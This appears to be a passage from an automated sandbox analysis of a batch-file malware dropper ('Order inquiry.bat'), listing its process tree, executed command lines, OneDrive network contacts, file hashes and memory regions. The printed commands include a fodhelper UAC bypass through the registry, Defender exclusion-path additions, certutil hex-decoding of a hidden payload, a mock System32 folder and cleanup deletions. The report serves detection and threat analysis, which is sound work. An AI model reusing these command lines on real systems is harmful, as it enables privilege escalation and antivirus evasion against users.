PID 2480 wrote to memory of 1448 | N/A | C:\Users\Public\Libraries\Lewxa.com | C:\Windows\SysWOW64\cmd.exe
PID 2480 wrote to memory of 224 | N/A | C:\Users\Public\Libraries\Lewxa.com | C:\Windows\SysWOW64\cmd.exe
PID 2480 wrote to memory of 224 | N/A | C:\Users\Public\Libraries\Lewxa.com | C:\Windows\SysWOW64\cmd.exe
PID 2480 wrote to memory of 224 | N/A | C:\Users\Public\Libraries\Lewxa.com | C:\Windows\SysWOW64\cmd.exe
PID 2480 wrote to memory of 2116 | N/A | C:\Users\Public\Libraries\Lewxa.com | C:\Windows\SysWOW64\cmd.exe
PID 2480 wrote to memory of 2116 | N/A | C:\Users\Public\Libraries\Lewxa.com | C:\Windows\SysWOW64\cmd.exe
PID 2480 wrote to memory of 2116 | N/A | C:\Users\Public\Libraries\Lewxa.com | C:\Windows\SysWOW64\cmd.exe
PID 2116 wrote to memory of 2072 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows \System32\1177894.exe
PID 2116 wrote to memory of 2072 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows \System32\1177894.exe
PID 2072 wrote to memory of 4084 | N/A | C:\Windows \System32\1177894.exe | C:\Windows\system32\cmd.exe
PID 2072 wrote to memory of 4084 | N/A | C:\Windows \System32\1177894.exe | C:\Windows\system32\cmd.exe
PID 4084 wrote to memory of 2796 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 4084 wrote to memory of 2796 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat"

C:\Windows\system32\cmd.exe

cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "

C:\Users\Public\xkn.exe

C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "

C:\Users\Public\alpha.exe

"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "

C:\Windows\system32\fodhelper.exe

"C:\Windows\system32\fodhelper.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat" "C:\\Users\\Public\\Lewxa.txt" 9

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat" "C:\\Users\\Public\\Lewxa.txt" 9

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12

C:\Users\Public\Libraries\Lewxa.com

C:\\Users\\Public\\Libraries\\Lewxa.com

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM SystemSettings.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM SystemSettingsAdminFlows.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c mkdir "\\?\C:\Windows "

C:\Windows\SysWOW64\cmd.exe

cmd /c mkdir "\\?\C:\Windows \System32"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Windows \System32\1177894.exe"

C:\Windows \System32\1177894.exe

"C:\Windows \System32\1177894.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""

C:\Windows\system32\cmd.exe

cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"

C:\Windows\SysWOW64\extrac32.exe

C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Lewxa.com C:\\Users\\Public\\Libraries\\Othwubnr.PIF

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\System32\SndVol.exe

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat

Network

Country Destination Domain Proto
US 8.8.8.8:53 onedrive.live.com udp
US 13.107.137.11:443 onedrive.live.com tcp
US 13.107.137.11:443 onedrive.live.com tcp
US 8.8.8.8:53 hgitta.dm.files.1drv.com udp
US 13.107.42.12:443 hgitta.dm.files.1drv.com tcp
US 8.8.8.8:53 11.137.107.13.in-addr.arpa udp
US 8.8.8.8:53 12.42.107.13.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp

Files

C:\Users\Public\alpha.exe

MD5 94912c1d73ade68f2486ed4d8ea82de6
SHA1 524ab0a40594d2b5f620f542e87a45472979a416
SHA256 9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9
SHA512 f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d

C:\Users\Public\xkn.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/2852-21-0x0000029A73F80000-0x0000029A73FA2000-memory.dmp

memory/2852-23-0x00007FFA30E30000-0x00007FFA3181C000-memory.dmp

memory/2852-25-0x0000029A74000000-0x0000029A74010000-memory.dmp

memory/2852-26-0x0000029A74000000-0x0000029A74010000-memory.dmp

memory/2852-29-0x0000029A74290000-0x0000029A74306000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iyi3ttcc.wqt.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2852-52-0x0000029A74000000-0x0000029A74010000-memory.dmp

memory/2852-56-0x00007FFA30E30000-0x00007FFA3181C000-memory.dmp

C:\Users\Public\kn.exe

MD5 4906f49c4e1fc1015565ef490f2f21e0
SHA1 c9e581a4df721a9414b5cb6edf75c310c29bc20b
SHA256 628ff4680652865151ecc8ae2728a6bd67b939e83220909275188a55c480dc17
SHA512 2704531f8e50c856f8f2648e91e3cd97a7d7da46597e8a69bcd958a660f151084e5de6d937e768b7fdca0e118710d0737a03871931228f41dc7764e611d9c2b5

C:\Users\Public\kn.exe

MD5 056c7d065f4622da9cc2848f47e2bae2
SHA1 6c6f18b0ec53dc63488961c4240ec584ac71c25f
SHA256 e09a2d7ecac1a10c89e27750a18790da06ddd7311965dbc9ab6096f636dae61c
SHA512 db158c9b669a2668149caf30df32595a488dcc831d7518ca2e793eac0885492a2eaee838914e706a585b7f3f1c801e299c697b2cec509204561bb098e16253d5

C:\Users\Public\Lewxa.txt

MD5 5e3260366c3c643511ba9d5f0bffefd4
SHA1 ef84ae0ed0a835dda0c8ebab1c166e95e8da1403
SHA256 41d8ce140db1ab125f33ac3e8603d01fd85191b37b41314808cb29e069dd4243
SHA512 46e1a3f630e0710bb182a0d9cc1876d7df725c818342def0ed1a657cc6b79b9c996ae483d09357344234d725a10c4af037e67ece32293b63fcb4bf7c932acfc7

C:\Users\Public\Libraries\Lewxa.com

MD5 aa6d1a831ba292e2670da589b8aea980
SHA1 fe61d016a11a1ea9b85bec7139d44b1acbb6bfcd
SHA256 f5cd840346c9d16181109ba81cd4206e46f87682799b54eaa0f3cb4689a7d05d
SHA512 d0eaa2933b75d9114714ecf6c0f04b1bc4396ee570759bc3d7bfca7426f039d0234ffc6791de66332ce5682dfbc5a6daa1fbb252b68e67c65362e42a5a295c08

memory/2480-72-0x00000000007C0000-0x00000000007C1000-memory.dmp

memory/2480-77-0x0000000004130000-0x0000000005130000-memory.dmp

memory/2480-79-0x0000000004130000-0x0000000005130000-memory.dmp

memory/2480-81-0x0000000000400000-0x0000000000527000-memory.dmp

memory/2480-82-0x00000000007C0000-0x00000000007C1000-memory.dmp

C:\Windows \System32\1177894.exe

MD5 231ce1e1d7d98b44371ffff407d68b59
SHA1 25510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA256 30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512 520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

C:\Windows \System32\netutils.dll

MD5 fa7aa88417d0c48807144a1a48fe3fbc
SHA1 6f5ec990b12d4a6075050a94e0d68d03781fa46d
SHA256 2019dcd18ba7d5554a4a9da882740aa883941670af3de9396960081a0f8aa098
SHA512 99b2eb6f8e7d00a3803cba229149e5e0cb67a3deb607782c55fbacd25d9c074cce83759de15490eff939d5ad98f26cdbd44395cc79ffe22753e16c3d9e3b5fff

memory/2072-95-0x00000000613C0000-0x00000000613E3000-memory.dmp

C:\windows \system32\KDECO.bat

MD5 c545650595b479c81ad6b9d8882aae39
SHA1 7a98aa2e6eee23b3c1bba876955d525bc618b3f0
SHA256 a3a80983cb33159f0455fa0135789402558baa1460db94d0071318512b8cb5f9
SHA512 85ac596a7da9072a28c4178e4fdedc98f1b49c8e3fe5612cfe464833297b13f65d2dc59b52d7fc9970cff8f98d954111229aec0ed9dded454e03b0cf4ebb6ff3

memory/4112-101-0x00007FFA304F0000-0x00007FFA30EDC000-memory.dmp

memory/4112-102-0x000001B44C680000-0x000001B44C690000-memory.dmp

memory/4112-103-0x000001B44C680000-0x000001B44C690000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 57f54ca96ff7c5a70b0791a3b3694723
SHA1 e264cbc90400011f9162408d5ef5e58d41794fdf
SHA256 0f1a6aaec264f27eee7bb190bbc06daca8303d9e6455100b9cc5fcfaad5b0b06
SHA512 fc3347fe3bcd3b7f0bc05424dbd9e58496437f3c9f44125ea9c2bcc80f34f80a37ee2c7c62c8680ac1f6496b8e42d61122167d487e527c8b85f1f59bdf5b8293

memory/4112-119-0x000001B44C680000-0x000001B44C690000-memory.dmp

memory/4112-145-0x00007FFA304F0000-0x00007FFA30EDC000-memory.dmp

memory/5100-152-0x0000000000260000-0x0000000000298000-memory.dmp

memory/5100-153-0x0000000000260000-0x0000000000298000-memory.dmp

memory/5100-155-0x0000000000260000-0x0000000000298000-memory.dmp